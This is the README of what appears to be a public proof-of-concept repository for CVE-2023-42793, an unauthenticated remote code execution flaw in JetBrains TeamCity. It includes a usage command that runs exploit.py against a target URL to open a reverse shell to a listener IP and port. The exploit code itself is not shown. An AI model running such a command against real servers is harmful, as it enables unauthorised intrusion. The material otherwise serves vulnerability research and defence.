JetBrains TeamCity Unauthenticated Remote Code Execution - Python3 Implementation# CVE-2023-42793
JetBrains TeamCity before 2023.05.4 is vulnerable to authentication bypass leading to RCE
# Usage
To get a reverse shell
```bash
python3 exploit.py <target_url> <listener_ip> <listener_port>
```
# References
https://blog.jetbrains.com/teamcity/2023/09/cve-2023-42793-vulnerability-post-mortem/</br>
http://packetstormsecurity.com/files/174860/JetBrains-TeamCity-Unauthenticated-Remote-Code-Execution.html</br>
https://nvd.nist.gov/vuln/detail/cve-2023-42793
[4.0K] /data/pocs/afe8cac0a9b234e9fc9f8ea39e1de26ebcf8b811
├── [1.9K] exploit.py
└── [ 477] README.md
0 directories, 2 files